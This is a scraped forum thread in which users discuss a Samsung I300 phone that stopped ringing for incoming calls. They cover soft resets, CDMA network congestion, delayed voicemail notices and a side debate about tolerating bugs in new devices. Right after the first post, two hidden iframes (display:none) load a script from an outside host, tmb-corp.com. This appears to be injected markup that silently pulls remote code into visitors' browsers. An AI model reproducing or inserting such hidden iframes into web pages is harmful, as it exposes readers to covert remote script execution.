+ Reply to Thread

No ring for incoming calls

I encountered a new problem yesterday (1st and hopefully last). My husband called me, and I missed the call because the phone did not ring (ring was on level 8 and vibrate).

When I got home, I tried calling my cell from my home phone, and the cell simply would not ring. Voice mail picked up after 4 rings. The screen eventually read 1 missed call.

I called several more times, and still no ring. If i hit one of the buttons on the cell as my home phone was calling, however, the cell phone would finally start to ring.

Then I tried the voice dial, and that would not work either. It would give me the message "who would you like to call," then nothing happens when I say the name.

I finally did a soft reset, and the ringer and voice dial started working again. I hope this is the last time I have to do this. I can't even imagine what caused the problem to begin with.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

How long have you had the phone. I wouldn't panic. What we all have trouble remembering is that just as your PC spits crazy messages at you from time to time, which are easily repaired by itself on a reset, our palm top computers should be granted the same patience. They are after all computers. If the reset fixed the problem, no biggie. Should the problem persist however.....

yeah, i wouldnt worry about it. the more complicated a device is, the higher the chances of things going wrong. just yesterday, a call was coming in, and i have mine set to vol. 8 and vibrate. the phone was ringing and vibrating, but the home phone display was showing and it did not display the caller id or anything. i kept pushing "talk" and it just said "release key guard first" which is supposed to be overidden when a call is coming in. minutes later, the voicemail message beeped in, but, for some reason, the phone kept vibrating (no ring anymore), MANY minutes after the call had going to VM. I ended up having to pull the battery and push it back in to stop the vibrating...and it never recorded the call in the incoming or missed log. funny...just a quick hit on the head (reset) clears up things usually.

Quick question....
    Why do we tolerate bugs and problems from our technical devices? Why has this become the norm. (Has Microsoft set the bar THAT low). If your toaster or TV or stereo was plauged with problems or inconsistancies would you consider it as normal. Are we (by sitting on the cutting edge of technology) helping the problem by saying.... "well this is cool, so I am willing to tolerate problems".
    Just wondering.
    Carl

Try doing a soft reset on the handset; and/or power the handset all the way off by removing the battery for 10 seconds. This may clear an error condition in the handset.

During peak network saturation conditions - most typically around rush hour, but these may occur more frequently if you're in an area with very high cell phone density - you will occasionally see
    anomalous behavior on ANY CDMA handset.

I live and work in such an area and frequently do not get a ringer on an incoming call at such times - the handset ALSO does not log either an incoming or missed call for these. The same behavior can be observed on regualr handsets on the same carrier's service.

Additionally, there are sometimes long delays for voice mail notifications on calls like these; Sprint PCS maintains several master voice mail servers across their network; if one is saturated you will roll over to another when leaving a message. If a message has been left on a server that is not the "home"
    server for your handset, you will not get the notification alert until the servers do their database replication with one another.

Originally posted by CarlGalgano
    Quick question....
    Why do we tolerate bugs and problems from our technical devices? Why has this become the norm. (Has Microsoft set the bar THAT low). If your toaster or TV or stereo was plauged with problems or inconsistancies would you consider it as normal. Are we (by sitting on the cutting edge of technology) helping the problem by saying.... "well this is cool, so I am willing to tolerate problems".
    Just wondering.
    the way i think about it is as the device becomes more complex, more tolerance is allotted to that device with regard to errors/bugs. It seems to make sense anyway; A toaster is less likely to make errors as teh device is so simple, yet, when compared to an I300 phone, you should be able to tolerate some errors knowing the device is more complex in nature. There isnt much room for errors in a toaster due to its simplicity...once the toaster is fried, get rid of it and get a new one!

Administrator

Arrow

yep.. we come to expect the first generation devices to show bugs... thats a sad but true thing happeneing now... everyone is tring to get the product out first before everyone else and that makes for errors to h appen in the process..

just like in the news media... the station want to get the inof out thee first.. it may not be accurate, but atleast they said it first!

Originally posted by Stillen_I30

A toaster is less likely to make errors as teh device is so simple,
    But your TV set is not simple..... neither is putting a man on the moon......I don't want to start a long drawn our philisophical disucssion here..... but I think we are TOO tolerant. I have 5 iSeries (IBM) servers in my office. They don't crash, we have had one for over 10 years now. It runs 365/24/7, it has had 4 hours of unplanned downtime in over 10 years. My phone has has more than that in 2 month.
    Carl

You can't believe that a man travels to the moon without things going wrong? A lot of half empty people on this board. Slow down and enjoy the darn phone! As Marc said, this is the first edition. Brand new baby. If you didn't want to deal with the errors, what influenced your purchase? The fantasy that this device was unsinkable. Were that the first server IBM had manufactured, I may entertain your arguement, but you are comparing apples and oranges friend.

Enjoy the I300.

I can accept certain bugs with bleeding edge devices like the I300....

others I don't, look at windows xp, it was out for just a few days and the FBI issued a national warning for everyone NOT to use it due to security issues... that is NOT acceptable in my book.... of course microsoft is protected, have you ever read of their license agreements?

one of particular interest is found in the agreement for using Microsoft frontpage, it says something like "you may NOT use this product to create webpages that deface the microsoft brand name" , crazy eh?

you might be suprised about recent TV's, if you have new bleeding edge TV, head of over to http://www.avsforum.com , I bet someone found bugs in it..... talk about picky, some of those people are insane....

Brooks

...and rightfully so for everyone to complain and protest about the XP glitches. Microsoft has been at this for quite a while now, and should know better. I don't understand the consumer that purchases "bleeding" technology without allowing room for error.

i would have to agree. something innovative in SOME way, whether it be design of hardware, software, etc., new or an improvement of a previous version, will have bugs in some form. especially when a new device is introduced into a new segment of devices, hybrid phone/pda, should allow tolerance for bugs. with regard to some "bugs," it could be situational, where only your particular device amongst a smaller batch of the entire offering could exhibit a certain bug, whilst someone with the same phone from a different batch may not have the same bug you have.